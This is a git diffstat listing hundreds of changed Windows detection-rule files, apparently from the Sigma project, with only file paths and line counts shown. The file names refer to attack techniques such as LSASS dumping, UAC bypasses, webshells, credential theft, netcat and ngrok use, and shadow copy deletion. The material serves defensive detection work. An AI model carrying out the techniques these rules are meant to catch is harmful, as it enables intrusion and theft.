+- ...c_creation_win_powershell_stop_service.yml | 21 +- ...on_win_powershell_susp_child_processes.yml | 10 +- ..._win_powershell_susp_download_patterns.yml | 10 +- ...in_powershell_susp_parameter_variation.yml | 7 +- ...ion_win_powershell_susp_parent_process.yml | 76 +- ...reation_win_powershell_susp_ps_appdata.yml | 9 +- ...on_win_powershell_susp_ps_downloadfile.yml | 5 +- ...ll_tamper_defender_remove_mppreference.yml | 11 +- ...ation_win_powershell_token_obfuscation.yml | 16 +- ...n_powershell_user_discovery_get_aduser.yml | 26 +- ...eation_win_powershell_webclient_casing.yml | 18 +- ...creation_win_powershell_x509enrollment.yml | 6 +- ...reation_win_powershell_xor_commandline.yml | 27 +- ...c_creation_win_powershell_zip_compress.yml | 28 +- ...creation_win_presentationhost_download.yml | 9 +- ...resentationhost_uncommon_location_exec.yml | 15 +- ...ation_win_pressanykey_lolbin_execution.yml | 10 +- ...oc_creation_win_print_remote_file_copy.yml | 8 +- ..._creation_win_protocolhandler_download.yml | 12 +- ...reation_win_provlaunch_potential_abuse.yml | 54 +- ...tion_win_provlaunch_susp_child_process.yml | 53 +- ...c_creation_win_psr_capture_screenshots.yml | 7 +- ...proc_creation_win_pua_3proxy_execution.yml | 6 +- ...oc_creation_win_pua_adfind_enumeration.yml | 19 +- ...roc_creation_win_pua_adfind_susp_usage.yml | 13 +- ...c_creation_win_pua_advanced_ip_scanner.yml | 11 +- ...creation_win_pua_advanced_port_scanner.yml | 8 +- ...creation_win_pua_advancedrun_priv_user.yml | 29 +- .../proc_creation_win_pua_chisel.yml | 10 +- .../proc_creation_win_pua_cleanwipe.yml | 14 +- .../proc_creation_win_pua_crassus.yml | 9 +- .../proc_creation_win_pua_csexec.yml | 5 +- .../proc_creation_win_pua_defendercheck.yml | 8 +- .../proc_creation_win_pua_ditsnap.yml | 7 +- .../proc_creation_win_pua_frp.yml | 22 +- .../proc_creation_win_pua_iox.yml | 22 +- .../proc_creation_win_pua_netcat.yml | 11 +- .../proc_creation_win_pua_ngrok.yml | 17 +- .../proc_creation_win_pua_nimgrab.yml | 11 +- .../proc_creation_win_pua_nircmd.yml | 13 +- ...proc_creation_win_pua_nircmd_as_system.yml | 2 +- .../proc_creation_win_pua_nmap_zenmap.yml | 16 +- .../proc_creation_win_pua_nps.yml | 24 +- .../proc_creation_win_pua_nsudo.yml | 32 +- .../proc_creation_win_pua_pingcastle.yml | 317 +- ...ation_win_pua_pingcastle_script_parent.yml | 86 +- .../proc_creation_win_pua_process_hacker.yml | 56 +- ...proc_creation_win_pua_rcedit_execution.yml | 21 +- ...proc_creation_win_pua_rclone_execution.yml | 19 +- .../proc_creation_win_pua_runxcmd.yml | 7 +- .../proc_creation_win_pua_seatbelt.yml | 44 +- .../proc_creation_win_pua_system_informer.yml | 28 +- ...oc_creation_win_pua_webbrowserpassview.yml | 9 +- ..._creation_win_pua_wsudo_susp_execution.yml | 14 +- .../proc_creation_win_python_adidnsdump.yml | 11 +- ...on_win_python_inline_command_execution.yml | 20 +- .../proc_creation_win_python_pty_spawn.yml | 12 +- .../proc_creation_win_query_session_exfil.yml | 7 +- .../proc_creation_win_rar_compress_data.yml | 9 +- ...tion_win_rar_compression_with_password.yml | 8 +- ...eation_win_rar_susp_greedy_compression.yml | 18 +- .../proc_creation_win_rasdial_execution.yml | 5 +- ...eation_win_rdrleakdiag_process_dumping.yml | 23 +- .../proc_creation_win_reg_add_run_key.yml | 8 +- .../proc_creation_win_reg_add_safeboot.yml | 16 +- .../proc_creation_win_reg_bitlocker.yml | 7 +- ..._credential_access_via_password_filter.yml | 5 +- ...oc_creation_win_reg_defender_exclusion.yml | 10 +- .../proc_creation_win_reg_delete_safeboot.yml | 14 +- .../proc_creation_win_reg_delete_services.yml | 12 +- ...tion_win_reg_desktop_background_change.yml | 39 +- ...direct_asep_registry_keys_modification.yml | 14 +- ..._creation_win_reg_disable_sec_services.yml | 9 +- ...eation_win_reg_dumping_sensitive_hives.yml | 46 +- ...numeration_for_credentials_in_registry.yml | 32 +- ...n_win_reg_import_from_suspicious_paths.yml | 15 +- ...n_win_reg_lsa_disable_restricted_admin.yml | 20 +- ...on_win_reg_lsa_ppl_protection_disabled.yml | 11 +- .../proc_creation_win_reg_machineguid.yml | 4 +- ...n_win_reg_modify_group_policy_settings.yml | 15 +- .../proc_creation_win_reg_nolmhash.yml | 16 +- .../proc_creation_win_reg_open_command.yml | 9 +- .../proc_creation_win_reg_query_registry.yml | 14 +- .../proc_creation_win_reg_rdp_keys_tamper.yml | 14 +- .../proc_creation_win_reg_screensaver.yml | 30 +- ...ation_win_reg_service_imagepath_change.yml | 18 +- ...oc_creation_win_reg_software_discovery.yml | 14 +- .../proc_creation_win_reg_susp_paths.yml | 10 +- .../proc_creation_win_reg_volsnap_disable.yml | 2 +- ...eation_win_reg_windows_defender_tamper.yml | 21 +- ...reg_write_protect_for_storage_disabled.yml | 8 +- ...m_regsvcs_uncommon_extension_execution.yml | 22 +- ...sm_regsvcs_uncommon_location_execution.yml | 24 +- ...ation_win_regedit_export_critical_keys.yml | 14 +- .../proc_creation_win_regedit_export_keys.yml | 16 +- .../proc_creation_win_regedit_import_keys.yml | 14 +- ...c_creation_win_regedit_import_keys_ads.yml | 14 +- ..._creation_win_regedit_trustedinstaller.yml | 2 +- .../proc_creation_win_regini_ads.yml | 13 +- .../proc_creation_win_regini_execution.yml | 13 +- ...tion_win_registry_cimprovider_dll_load.yml | 4 +- ...gistry_enumeration_for_credentials_cli.yml | 9 +- ...urity_zone_protocol_defaults_downgrade.yml | 14 +- ...registry_install_reg_debugger_backdoor.yml | 7 +- ...roc_creation_win_registry_logon_script.yml | 12 +- ...tion_win_registry_new_network_provider.yml | 15 +- ...y_privilege_escalation_via_service_key.yml | 7 +- ...gistry_provlaunch_provisioning_command.yml | 17 +- ...egistry_set_unsecure_powershell_policy.yml | 19 +- ...n_win_registry_typed_paths_persistence.yml | 5 +- ...oc_creation_win_regsvr32_flags_anomaly.yml | 9 +- ..._creation_win_regsvr32_http_ip_pattern.yml | 9 +- ..._creation_win_regsvr32_network_pattern.yml | 15 +- ...roc_creation_win_regsvr32_remote_share.yml | 7 +- ...eation_win_regsvr32_susp_child_process.yml | 10 +- ...creation_win_regsvr32_susp_exec_path_1.yml | 16 +- ...creation_win_regsvr32_susp_exec_path_2.yml | 27 +- ..._creation_win_regsvr32_susp_extensions.yml | 15 +- ...proc_creation_win_regsvr32_susp_parent.yml | 16 +- ...eation_win_regsvr32_uncommon_extension.yml | 26 +- ...eation_win_remote_access_tools_anydesk.yml | 28 +- ...s_tools_anydesk_piped_password_via_cli.yml | 6 +- ...te_access_tools_anydesk_silent_install.yml | 7 +- ..._remote_access_tools_anydesk_susp_exec.yml | 30 +- ...mote_access_tools_netsupport_susp_exec.yml | 15 +- ...ccess_tools_rurat_non_default_location.yml | 13 +- ...mote_access_tools_screenconnect_access.yml | 5 +- ...ote_access_tools_screenconnect_anomaly.yml | 5 +- ...access_tools_screenconnect_remote_exec.yml | 11 +- ...roc_creation_win_remote_time_discovery.yml | 15 +- .../proc_creation_win_renamed_adfind.yml | 20 +- .../proc_creation_win_renamed_autoit.yml | 33 +- .../proc_creation_win_renamed_browsercore.yml | 5 +- .../proc_creation_win_renamed_cloudflared.yml | 12 +- .../proc_creation_win_renamed_createdump.yml | 25 +- .../proc_creation_win_renamed_curl.yml | 9 +- .../proc_creation_win_renamed_gpg4win.yml | 5 +- ...oc_creation_win_renamed_netsupport_rat.yml | 13 +- ..._creation_win_renamed_office_processes.yml | 38 +- .../proc_creation_win_renamed_paexec.yml | 40 +- .../proc_creation_win_renamed_pingcastle.yml | 61 +- .../proc_creation_win_renamed_pressanykey.yml | 9 +- ...win_renamed_rundll32_dllregisterserver.yml | 12 +- ...tion_win_renamed_sysinternals_procdump.yml | 16 +- .../proc_creation_win_renamed_vmnat.yml | 5 +- ...reation_win_rpcping_credential_capture.yml | 31 +- ...tion_win_ruby_inline_command_execution.yml | 9 +- ..._win_rundll32_ads_stored_dll_execution.yml | 12 +- ...ndll32_advpack_obfuscated_ordinal_call.yml | 19 +- .../proc_creation_win_rundll32_by_ordinal.yml | 17 +- .../proc_creation_win_rundll32_inline_vbs.yml | 5 +- ...eation_win_rundll32_installscreensaver.yml | 9 +- ...ion_win_rundll32_js_runhtmlapplication.yml | 7 +- .../proc_creation_win_rundll32_keymgr.yml | 9 +- ...win_rundll32_mshtml_runhtmlapplication.yml | 10 +- .../proc_creation_win_rundll32_no_params.yml | 5 +- .../proc_creation_win_rundll32_ntlmrelay.yml | 11 +- ...n_win_rundll32_obfuscated_ordinal_call.yml | 8 +- ..._creation_win_rundll32_parent_explorer.yml | 12 +- ..._win_rundll32_process_dump_via_comsvcs.yml | 23 +- ...on_win_rundll32_registered_com_objects.yml | 8 +- ...oc_creation_win_rundll32_run_locations.yml | 27 +- .../proc_creation_win_rundll32_script_run.yml | 9 +- ...on_win_rundll32_shell32_susp_execution.yml | 8 +- ...rundll32_shelldispatch_potential_abuse.yml | 9 +- ...oc_creation_win_rundll32_susp_activity.yml | 162 +- ...ion_win_rundll32_susp_control_dll_load.yml | 9 +- ...32_susp_execution_with_image_extension.yml | 13 +- ..._win_rundll32_susp_shellexec_execution.yml | 12 +- ...tion_win_rundll32_susp_shimcache_flush.yml | 11 +- .../proc_creation_win_rundll32_sys.yml | 7 +- .../proc_creation_win_rundll32_unc_path.yml | 11 +- ...on_win_rundll32_uncommon_dll_extension.yml | 17 +- .../proc_creation_win_rundll32_user32_dll.yml | 14 +- ...n_win_rundll32_webdav_client_execution.yml | 16 +- ..._rundll32_webdav_client_susp_execution.yml | 26 +- ...eation_win_rundll32_without_parameters.yml | 5 +- .../proc_creation_win_runonce_execution.yml | 11 +- ..._change_sevice_image_path_by_non_admin.yml | 9 +- .../proc_creation_win_sc_create_service.yml | 8 +- .../proc_creation_win_sc_disable_service.yml | 11 +- ...proc_creation_win_sc_new_kernel_driver.yml | 6 +- .../proc_creation_win_sc_query.yml | 13 +- ...ion_win_sc_sdset_allow_service_changes.yml | 28 +- ...ation_win_sc_sdset_deny_service_access.yml | 31 +- ...roc_creation_win_sc_sdset_hide_sevices.yml | 23 +- ...roc_creation_win_sc_sdset_modification.yml | 17 +- ...ation_win_sc_service_path_modification.yml | 11 +- ..._win_sc_service_tamper_for_persistence.yml | 38 +- .../proc_creation_win_sc_stop_service.yml | 21 +- ...tion_win_schtasks_appdata_local_system.yml | 15 +- .../proc_creation_win_schtasks_change.yml | 23 +- .../proc_creation_win_schtasks_creation.yml | 6 +- ...tion_win_schtasks_creation_temp_folder.yml | 7 +- .../proc_creation_win_schtasks_delete.yml | 18 +- .../proc_creation_win_schtasks_delete_all.yml | 8 +- .../proc_creation_win_schtasks_disable.yml | 14 +- .../proc_creation_win_schtasks_env_folder.yml | 42 +- ...oc_creation_win_schtasks_folder_combos.yml | 13 +- ...c_creation_win_schtasks_guid_task_name.yml | 12 +- ...n_schtasks_one_time_only_midnight_task.yml | 11 +- .../proc_creation_win_schtasks_parent.yml | 12 +- ...schtasks_persistence_windows_telemetry.yml | 20 +- .../proc_creation_win_schtasks_reg_loader.yml | 22 +- ...eation_win_schtasks_reg_loader_encoded.yml | 21 +- ...oc_creation_win_schtasks_schedule_type.yml | 19 +- ...tion_win_schtasks_schedule_type_system.yml | 22 +- ...asks_schedule_via_masqueraded_xml_file.yml | 18 +- ...roc_creation_win_schtasks_susp_pattern.yml | 25 +- .../proc_creation_win_schtasks_system.yml | 26 +- ...reation_win_scrcons_susp_child_process.yml | 2 +- ..._creation_win_sdbinst_shim_persistence.yml | 22 +- ...oc_creation_win_sdbinst_susp_extension.yml | 37 +- .../proc_creation_win_sdclt_child_process.yml | 3 +- ...roc_creation_win_sdiagnhost_susp_child.yml | 9 +- .../proc_creation_win_secedit_execution.yml | 13 +- ..._creation_win_servu_susp_child_process.yml | 10 +- ...oc_creation_win_setspn_spn_enumeration.yml | 12 +- .../proc_creation_win_shutdown_execution.yml | 4 +- .../proc_creation_win_shutdown_logoff.yml | 4 +- ...eation_win_sndvol_susp_child_processes.yml | 7 +- ...eation_win_soundrecorder_audio_capture.yml | 4 +- ...proc_creation_win_splwow64_cli_anomaly.yml | 4 +- ...ation_win_spoolsv_susp_child_processes.yml | 29 +- ...roc_creation_win_sqlcmd_veeam_db_recon.yml | 9 +- .../proc_creation_win_sqlcmd_veeam_dump.yml | 4 +- ...ation_win_sqlite_chromium_profile_data.yml | 25 +- ..._win_sqlite_firefox_gecko_profile_data.yml | 15 +- .../proc_creation_win_squirrel_download.yml | 27 +- ..._creation_win_squirrel_proxy_execution.yml | 39 +- .../proc_creation_win_ssh_port_forward.yml | 4 +- .../proc_creation_win_ssh_rdp_tunneling.yml | 11 +- .../proc_creation_win_ssm_agent_abuse.yml | 7 +- ...eation_win_stordiag_susp_child_process.yml | 7 +- ...oc_creation_win_susp_16bit_application.yml | 6 +- ...ation_win_susp_abusing_debug_privilege.yml | 20 +- ...on_win_susp_add_user_local_admin_group.yml | 25 +- ...win_susp_add_user_remote_desktop_group.yml | 25 +- ...eation_win_susp_alternate_data_streams.yml | 15 +- ...ays_install_elevated_windows_installer.yml | 18 +- .../proc_creation_win_susp_appx_execution.yml | 16 +- ...ary_shell_execution_via_settingcontent.yml | 8 +- ...reation_win_susp_archiver_iso_phishing.yml | 10 +- ...creation_win_susp_automated_collection.yml | 9 +- ...n_susp_bad_opsec_sacrificial_processes.yml | 49 +- ...tion_win_susp_child_process_as_system_.yml | 18 +- ...n_win_susp_cli_obfuscation_escape_char.yml | 7 +- ...ation_win_susp_cli_obfuscation_unicode.yml | 54 +- ...usp_commandline_path_traversal_evasion.yml | 13 +- ...oc_creation_win_susp_copy_browser_data.yml | 50 +- ...reation_win_susp_copy_lateral_movement.yml | 43 +- ...proc_creation_win_susp_copy_system_dir.yml | 45 +- ...eation_win_susp_copy_system_dir_lolbin.yml | 36 +- ...creation_win_susp_crypto_mining_monero.yml | 6 +- ...ion_win_susp_data_exfiltration_via_cli.yml | 63 +- ...proc_creation_win_susp_disable_raccine.yml | 9 +- ...roc_creation_win_susp_double_extension.yml | 15 +- ...ation_win_susp_double_extension_parent.yml | 80 +- ...eation_win_susp_download_office_domain.yml | 30 +- ...reation_win_susp_dumpstack_log_evasion.yml | 4 +- ...on_win_susp_elavated_msi_spawned_shell.yml | 16 +- ...reation_win_susp_electron_app_children.yml | 48 +- ...tion_win_susp_electron_exeuction_proxy.yml | 61 +- ..._elevated_system_shell_uncommon_parent.yml | 46 +- .../proc_creation_win_susp_embed_exe_lnk.yml | 7 +- ...tion_win_susp_etw_modification_cmdline.yml | 6 +- ...oc_creation_win_susp_etw_trace_evasion.yml | 23 +- .../proc_creation_win_susp_eventlog_clear.yml | 31 +- ...eation_win_susp_eventlog_content_recon.yml | 44 +- ..._susp_execution_from_guid_folder_names.yml | 25 +- ...execution_from_public_folder_as_parent.yml | 5 +- .../proc_creation_win_susp_execution_path.yml | 46 +- ...tion_win_susp_execution_path_webserver.yml | 7 +- ...win_susp_gather_network_info_execution.yml | 15 +- ...n_win_susp_hidden_dir_index_allocation.yml | 14 +- ...in_susp_hiding_malware_in_fonts_folder.yml | 10 +- ...win_susp_homoglyph_cyrillic_lookalikes.yml | 118 +- .../proc_creation_win_susp_image_missing.yml | 28 +- ...ation_win_susp_inline_base64_mz_header.yml | 4 +- ...reation_win_susp_inline_win_api_access.yml | 15 +- ...p_local_system_owner_account_discovery.yml | 43 +- ..._win_susp_lolbin_exec_from_non_c_drive.yml | 53 +- ...eation_win_susp_lsass_dmp_cli_keywords.yml | 52 +- ...tion_win_susp_ms_appinstaller_download.yml | 13 +- ...proc_creation_win_susp_network_command.yml | 5 +- ...oc_creation_win_susp_network_scan_loop.yml | 8 +- ...roc_creation_win_susp_network_sniffing.yml | 21 +- .../proc_creation_win_susp_non_exe_image.yml | 58 +- ...c_creation_win_susp_non_priv_reg_or_ps.yml | 11 +- .../proc_creation_win_susp_ntds.yml | 57 +- ...creation_win_susp_nteventlogfile_usage.yml | 11 +- ..._win_susp_ntfs_short_name_path_use_cli.yml | 42 +- ...in_susp_ntfs_short_name_path_use_image.yml | 42 +- ...ation_win_susp_ntfs_short_name_use_cli.yml | 20 +- ...ion_win_susp_ntfs_short_name_use_image.yml | 16 +- ...eation_win_susp_obfuscated_ip_download.yml | 32 +- ...reation_win_susp_obfuscated_ip_via_cli.yml | 32 +- ..._creation_win_susp_office_token_search.yml | 10 +- .../proc_creation_win_susp_parents.yml | 17 +- ...in_susp_priv_escalation_via_named_pipe.yml | 21 +- ...c_creation_win_susp_private_keys_recon.yml | 32 +- ...susp_privilege_escalation_cli_patterns.yml | 9 +- ...oc_creation_win_susp_proc_wrong_parent.yml | 18 +- .../proc_creation_win_susp_progname.yml | 31 +- .../proc_creation_win_susp_recon.yml | 25 +- ...on_win_susp_recycle_bin_fake_execution.yml | 10 +- ...on_win_susp_redirect_local_admin_share.yml | 7 +- ...tion_win_susp_remote_desktop_tunneling.yml | 8 +- ...eation_win_susp_right_to_left_override.yml | 12 +- ...n_win_susp_script_exec_from_env_folder.yml | 27 +- ...reation_win_susp_script_exec_from_temp.yml | 10 +- ...roc_creation_win_susp_service_creation.yml | 17 +- .../proc_creation_win_susp_service_dir.yml | 2 +- .../proc_creation_win_susp_service_tamper.yml | 69 +- ...eation_win_susp_shadow_copies_creation.yml | 25 +- ...eation_win_susp_shadow_copies_deletion.yml | 53 +- ...tion_win_susp_shell_spawn_susp_program.yml | 15 +- .../proc_creation_win_susp_sysnative.yml | 7 +- ...c_creation_win_susp_system_exe_anomaly.yml | 29 +- ..._creation_win_susp_system_user_anomaly.yml | 110 +- .../proc_creation_win_susp_sysvol_access.yml | 2 +- ..._creation_win_susp_task_folder_evasion.yml | 17 +- .../proc_creation_win_susp_use_of_te_bin.yml | 17 +- ...tion_win_susp_use_of_vsjitdebugger_bin.yml | 17 +- .../proc_creation_win_susp_userinit_child.yml | 6 +- ...tion_win_susp_weak_or_abused_passwords.yml | 9 +- ...n_win_susp_web_request_cmd_and_cmdlets.yml | 20 +- ...proc_creation_win_susp_whoami_as_param.yml | 5 +- .../proc_creation_win_susp_workfolders.yml | 4 +- ...in_svchost_execution_with_no_cli_flags.yml | 16 +- ...eation_win_svchost_termserv_proc_spawn.yml | 7 +- ...on_win_svchost_uncommon_parent_process.yml | 4 +- ...sinternals_accesschk_check_permissions.yml | 21 +- ..._win_sysinternals_adexplorer_execution.yml | 13 +- ...sysinternals_adexplorer_susp_execution.yml | 17 +- ...reation_win_sysinternals_eula_accepted.yml | 9 +- ...tion_win_sysinternals_livekd_execution.yml | 8 +- ...sysinternals_livekd_kernel_memory_dump.yml | 13 +- ...roc_creation_win_sysinternals_procdump.yml | 2 +- ...tion_win_sysinternals_procdump_evasion.yml | 18 +- ...eation_win_sysinternals_procdump_lsass.yml | 14 +- ...tion_win_sysinternals_psexec_execution.yml | 4 +- ...nternals_psexec_paexec_escalate_system.yml | 25 +- ...n_sysinternals_psexec_remote_execution.yml | 6 +- ...roc_creation_win_sysinternals_psexesvc.yml | 11 +- ...on_win_sysinternals_psexesvc_as_system.yml | 14 +- ...oc_creation_win_sysinternals_psloglist.yml | 19 +- ...oc_creation_win_sysinternals_psservice.yml | 11 +- ...n_win_sysinternals_pssuspend_execution.yml | 15 +- ..._sysinternals_pssuspend_susp_execution.yml | 18 +- ..._sysinternals_susp_psexec_paexec_flags.yml | 22 +- ..._win_sysinternals_sysmon_config_update.yml | 14 +- ...tion_win_sysinternals_sysmon_uninstall.yml | 16 +- ...on_win_sysinternals_tools_masquerading.yml | 7 +- .../proc_creation_win_sysprep_appdata.yml | 10 +- ...proc_creation_win_systeminfo_execution.yml | 4 +- ...ettingsadminflows_turn_on_dev_features.yml | 15 +- ...roc_creation_win_takeown_recursive_own.yml | 7 +- ...proc_creation_win_tapinstall_execution.yml | 11 +- .../proc_creation_win_tar_compression.yml | 12 +- .../proc_creation_win_tar_extraction.yml | 12 +- .../proc_creation_win_taskkill_sep.yml | 17 +- ..._creation_win_tasklist_basic_execution.yml | 10 +- .../proc_creation_win_taskmgr_localsystem.yml | 4 +- ...reation_win_taskmgr_susp_child_process.yml | 2 +- ...ms_suspicious_command_line_cred_access.yml | 14 +- ...on_win_tpmvscmgr_add_virtual_smartcard.yml | 4 +- .../proc_creation_win_tscon_localsystem.yml | 4 +- .../proc_creation_win_tscon_rdp_redirect.yml | 2 +- ...eation_win_tscon_rdp_session_hijacking.yml | 4 +- ..._creation_win_uac_bypass_changepk_slui.yml | 2 +- .../proc_creation_win_uac_bypass_cmstp.yml | 9 +- ...eation_win_uac_bypass_computerdefaults.yml | 5 +- ...eation_win_uac_bypass_consent_comctl32.yml | 5 +- .../proc_creation_win_uac_bypass_dismhost.yml | 3 +- ...on_win_uac_bypass_eventvwr_recentviews.yml | 9 +- ...proc_creation_win_uac_bypass_fodhelper.yml | 3 +- .../proc_creation_win_uac_bypass_ieinstal.yml | 4 +- ...c_creation_win_uac_bypass_msconfig_gui.yml | 2 +- ...tion_win_uac_bypass_ntfs_reparse_point.yml | 14 +- ...oc_creation_win_uac_bypass_pkgmgr_dism.yml | 5 +- .../proc_creation_win_uac_bypass_sdclt.yml | 5 +- ...oc_creation_win_uac_bypass_trustedpath.yml | 2 +- .../proc_creation_win_uac_bypass_wmp.yml | 10 +- .../proc_creation_win_uac_bypass_wsreset.yml | 14 +- ...win_uac_bypass_wsreset_integrity_level.yml | 2 +- ...c_creation_win_ultravnc_susp_execution.yml | 6 +- ...ation_win_uninstall_crowdstrike_falcon.yml | 8 +- ..._win_userinit_uncommon_child_processes.yml | 36 +- .../proc_creation_win_vaultcmd_list_creds.yml | 9 +- .../proc_creation_win_verclsid_runs_com.yml | 6 +- ...proc_creation_win_virtualbox_execution.yml | 11 +- ...n_win_virtualbox_vboxdrvinst_execution.yml | 17 +- ...ion_win_vmware_toolbox_cmd_persistence.yml | 13 +- ...in_vmware_toolbox_cmd_persistence_susp.yml | 16 +- ...win_vmware_vmtoolsd_susp_child_process.yml | 51 +- ...n_win_vscode_child_processes_anomalies.yml | 17 +- ...c_creation_win_vscode_tunnel_execution.yml | 13 +- ...eation_win_vscode_tunnel_remote_shell_.yml | 13 +- ...on_win_vscode_tunnel_renamed_execution.yml | 20 +- ...tion_win_vscode_tunnel_service_install.yml | 2 +- ...tion_win_vsdiagnostics_execution_proxy.yml | 11 +- ..._win_vslsagent_agentextensionpath_load.yml | 9 +- .../proc_creation_win_w32tm.yml | 9 +- ...ab_execution_from_non_default_location.yml | 7 +- .../proc_creation_win_wab_unusual_parents.yml | 12 +- ...n_win_wbadmin_delete_systemstatebackup.yml | 13 +- ...proc_creation_win_webdav_lnk_execution.yml | 8 +- .../proc_creation_win_webshell_chopper.yml | 9 +- .../proc_creation_win_webshell_hacking.yml | 55 +- ..._webshell_recon_commands_and_processes.yml | 87 +- ...ll_susp_process_spawned_from_webserver.yml | 21 +- .../proc_creation_win_webshell_tool_recon.yml | 11 +- ...reation_win_werfault_lsass_shtinkering.yml | 18 +- ...ion_win_werfault_reflect_debugger_exec.yml | 14 +- ...creation_win_wermgr_susp_child_process.yml | 9 +- ...creation_win_wermgr_susp_exec_location.yml | 11 +- ...c_creation_win_wget_download_direct_ip.yml | 17 +- ...get_download_susp_file_sharing_domains.yml | 19 +- ..._creation_win_where_browser_data_recon.yml | 22 +- ...proc_creation_win_whoami_all_execution.yml | 6 +- .../proc_creation_win_whoami_execution.yml | 7 +- ...hoami_execution_from_high_priv_process.yml | 11 +- ...c_creation_win_whoami_groups_discovery.yml | 10 +- .../proc_creation_win_whoami_output.yml | 12 +- ...roc_creation_win_whoami_parent_anomaly.yml | 10 +- ...roc_creation_win_whoami_priv_discovery.yml | 10 +- ...ion_win_windows_terminal_susp_children.yml | 58 +- ..._creation_win_winget_add_custom_source.yml | 14 +- ..._win_winget_add_insecure_custom_source.yml | 23 +- ...tion_win_winget_add_susp_custom_source.yml | 17 +- ..._win_winget_local_install_via_manifest.yml | 24 +- ...oc_creation_win_winrar_exfil_dmp_files.yml | 20 +- ...creation_win_winrar_susp_child_process.yml | 41 +- ...n_win_winrar_uncommon_folder_execution.yml | 22 +- .../proc_creation_win_winrm_awl_bypass.yml | 12 +- ..._execution_via_scripting_api_winrm_vbs.yml | 10 +- ...inrm_remote_powershell_session_process.yml | 8 +- ..._creation_win_winrm_susp_child_process.yml | 5 +- ...eation_win_winzip_password_compression.yml | 9 +- ..._wmi_backdoor_exchange_transport_agent.yml | 8 +- ..._wmi_persistence_script_event_consumer.yml | 6 +- ...eation_win_wmic_eventconsumer_creation.yml | 5 +- ...c_creation_win_wmic_namespace_defender.yml | 9 +- ...roc_creation_win_wmic_process_creation.yml | 13 +- ...creation_win_wmic_recon_computersystem.yml | 9 +- ...proc_creation_win_wmic_recon_csproduct.yml | 9 +- .../proc_creation_win_wmic_recon_group.yml | 20 +- .../proc_creation_win_wmic_recon_hotfix.yml | 10 +- .../proc_creation_win_wmic_recon_process.yml | 13 +- .../proc_creation_win_wmic_recon_product.yml | 9 +- ..._creation_win_wmic_recon_product_class.yml | 9 +- .../proc_creation_win_wmic_recon_service.yml | 28 +- ...on_win_wmic_recon_system_info_uncommon.yml | 24 +- ...win_wmic_recon_unquoted_service_search.yml | 17 +- ...roc_creation_win_wmic_remote_execution.yml | 16 +- ...creation_win_wmic_service_manipulation.yml | 8 +- ...oc_creation_win_wmic_squiblytwo_bypass.yml | 27 +- ...wmic_susp_execution_via_office_process.yml | 32 +- ...reation_win_wmic_susp_process_creation.yml | 12 +- ...reation_win_wmic_terminate_application.yml | 13 +- ...reation_win_wmic_uninstall_application.yml | 10 +- ...n_win_wmic_uninstall_security_products.yml | 17 +- ...reation_win_wmic_xsl_script_processing.yml | 27 +- ...creation_win_wmiprvse_spawning_process.yml | 22 +- ...reation_win_wmiprvse_spawns_powershell.yml | 23 +- ...tion_win_wmiprvse_susp_child_processes.yml | 31 +- ...ation_win_wpbbin_potential_persistence.yml | 8 +- ...eation_win_wscript_cscript_script_exec.yml | 24 +- ...n_wscript_cscript_susp_child_processes.yml | 31 +- ...script_cscript_uncommon_extension_exec.yml | 19 +- ...tion_win_wsl_child_processes_anomalies.yml | 13 +- ...proc_creation_win_wsl_lolbin_execution.yml | 28 +- .../proc_creation_win_wuauclt_dll_loading.yml | 30 +- ...ion_win_wuauclt_no_cli_flags_execution.yml | 12 +- ...creation_win_wusa_cab_files_extraction.yml | 11 +- ...a_cab_files_extraction_from_susp_paths.yml | 11 +- ...reation_win_wusa_susp_parent_execution.yml | 32 +- .../registry_add_malware_netwire.yml | 2 +- .../registry_add_malware_ursnif.yml | 2 +- ...egistry_add_persistence_amsi_providers.yml | 8 +- ...gistry_add_persistence_com_key_linking.yml | 4 +- ...persistence_disk_cleanup_handler_entry.yml | 20 +- ...e_logon_scripts_userinitmprlogonscript.yml | 8 +- ...dd_pua_sysinternals_execution_via_eula.yml | 5 +- ...ysinternals_renamed_execution_via_eula.yml | 15 +- ...a_sysinternals_susp_execution_via_eula.yml | 17 +- .../registry_event_apt_oilrig_mar18.yml | 18 +- .../registry_event_bypass_via_wsreset.yml | 4 +- ...stry_event_cmstp_execution_by_registry.yml | 3 +- ...y_events_logging_adding_reg_key_minint.yml | 10 +- ...event_disable_wdigest_credential_guard.yml | 11 +- ...entutl_volume_shadow_copy_service_keys.yml | 4 +- ...t_hybridconnectionmgr_svc_installation.yml | 5 +- .../registry_event_mal_flowcloud.yml | 10 +- ...registry_event_malware_qakbot_registry.yml | 3 +- ...gistry_event_mimikatz_printernightmare.yml | 9 +- ...y_event_modify_screensaver_binary_path.yml | 3 +- ...ry_event_narrator_feedback_persistance.yml | 2 +- ..._dll_added_to_appcertdlls_registry_key.yml | 16 +- ...dll_added_to_appinit_dlls_registry_key.yml | 16 +- .../registry_event_office_test_regadd.yml | 3 +- ...event_office_trust_record_modification.yml | 7 +- ...registry_event_persistence_recycle_bin.yml | 4 +- .../registry_event_portproxy_registry_key.yml | 3 +- .../registry_event_runkey_winekey.yml | 6 +- .../registry_event_runonce_persistence.yml | 12 +- ...try_event_shell_open_keys_manipulation.yml | 11 +- ...registry_event_silentprocessexit_lsass.yml | 7 +- .../registry_event_ssp_added_lsa_config.yml | 6 +- ...registry_event_stickykey_like_backdoor.yml | 4 +- .../registry_event_susp_atbroker_change.yml | 3 +- .../registry_event_susp_download_run_key.yml | 3 +- .../registry_event_susp_lsass_dll_load.yml | 3 +- .../registry_event_susp_mic_cam_access.yml | 6 +- ...gistry_set_enable_anonymous_connection.yml | 3 +- ...stry_set_add_load_service_in_safe_mode.yml | 3 +- .../registry_set_add_port_monitor.yml | 15 +- .../registry_set_aedebug_persistence.yml | 7 +- ...et_allow_rdp_remote_assistance_feature.yml | 3 +- .../registry_set_amsi_com_hijack.yml | 6 +- ...set_asep_reg_keys_modification_classes.yml | 12 +- ..._set_asep_reg_keys_modification_common.yml | 32 +- ...eg_keys_modification_currentcontrolset.yml | 14 +- ...p_reg_keys_modification_currentversion.yml | 45 +- ...eg_keys_modification_currentversion_nt.yml | 32 +- ...eg_keys_modification_internet_explorer.yml | 12 +- ..._set_asep_reg_keys_modification_office.yml | 12 +- ..._reg_keys_modification_session_manager.yml | 15 +- ...p_reg_keys_modification_system_scripts.yml | 12 +- ...et_asep_reg_keys_modification_winsock2.yml | 21 +- ...asep_reg_keys_modification_wow6432node.yml | 32 +- ..._keys_modification_wow6432node_classes.yml | 12 +- ...odification_wow6432node_currentversion.yml | 18 +- .../registry_set_bginfo_custom_db.yml | 6 +- .../registry_set_bginfo_custom_vbscript.yml | 9 +- 